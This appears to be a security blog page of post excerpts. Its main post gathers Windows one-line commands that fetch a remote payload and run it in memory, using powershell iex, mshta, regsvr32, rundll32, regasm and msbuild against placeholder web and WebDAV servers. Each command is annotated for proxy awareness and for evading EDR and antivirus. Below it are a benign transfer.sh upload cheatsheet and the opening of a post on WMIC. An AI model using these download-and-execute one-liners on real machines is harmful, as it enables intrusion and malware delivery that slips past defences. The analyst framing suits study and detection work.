How a malware can download a remote payload and execute malicious code…in one line?

This post on arno0x0x‘s blog is awesome: an accurate analysis of some ‘one-line commands’ that can be used on a windows system in order to download a malicious payload and execute it.

The examples are developed using several script languages, it works in memory with a minimal disk footprint and are “proxy aware”, so can be executed also from a corporate network.

Priceless informations for any malware analyst!

Prerequisites

  • allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits huh ?
  • allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, does it ?
  • be proxy aware – because which company doesn’t use a web proxy for outgoing traffic nowadays ?
  • make use of as standard and widely deployed Microsoft binaries as possible – because you want this command line to execute on as much systems as possible
  • be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet ?
  • work in memory only – because your final payload might get caught by AV when written on disk

Examples

Powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

Process performing network call: powershell.exe
Payload written on disk: NO

Cmd

cmd.exe /k < \\webdavserver\folder\batchfile.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cscript/Wscript

cscript //E:jscript \\webdavserver\folder\payload.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

Process performing network call: mshta.exe
Payload written on disk: IE local cache

Rundll32

rundll32 \\webdavserver\folder\payload.dll,entrypoint

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Regasm/Regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Regsvr32

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

Process performing network call: regsvr32.exe
Payload written on disk: IE local cache

Msbuild

cmd /V/c"set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


For more information and examples, plese refer to arno0x0x‘a article:

Windows oneliners to download remote payload and execute arbitrary code

Share files from command line with transfer.sh: a simple cheatsheet

Transfer.sh is a website that helps users to share files from the command-line an efficient way.
It won’t required any additional software to work except cURL.

If your linux distribution doesn’t have cUrl (unlikely!), you can install it with

sudo apt install curl

The service is free and allows users to upload files up to 10 GB, that are deleted automatically from server after 14 days.

Here a brief cheatsheet.

Upload

$ curl --upload-file ./hello.txt https://transfer.sh/hello.txt

Encrypt & upload

$ cat /tmp/hello.txt|gpg -ac -o-|curl -X PUT --upload-file "-" https://transfer.sh/test.txt

Download & decrypt

$ curl https://transfer.sh/1lDau/test.txt|gpg -o- > /tmp/hello.txt

Upload and check with virustotal

$ curl -X PUT --upload-file nhgbhhj https://transfer.sh/test.txt/virustotal

Bash/Zsh alias

Add  to .bashrc or .zshrc:

transfer() {
# write to output to tmpfile because of progress bar
tmpfile=$( mktemp -t transferXXX )
curl --progress-bar --upload-file $1 https://transfer.sh/$(basename $1) >> $tmpfile;
cat $tmpfile;
rm -f $tmpfile;
}

alias transfer=transfer

Usage:

$ transfer test.txt

Windows Command Line cheatsheet (part 2): WMIC

This command-line tool is really useful for both penetration testing and forensics tasks

The previous article has raised interest in readers regarding WMIC.
So I decided to write an article dedicated to this tool.

If you’ve done any scripting for the Windows platform, you’ve probably bumped into the Windows Management Instrumentation (WMI) scripting API, which can be used to enumerate all kinds of information.

Continue…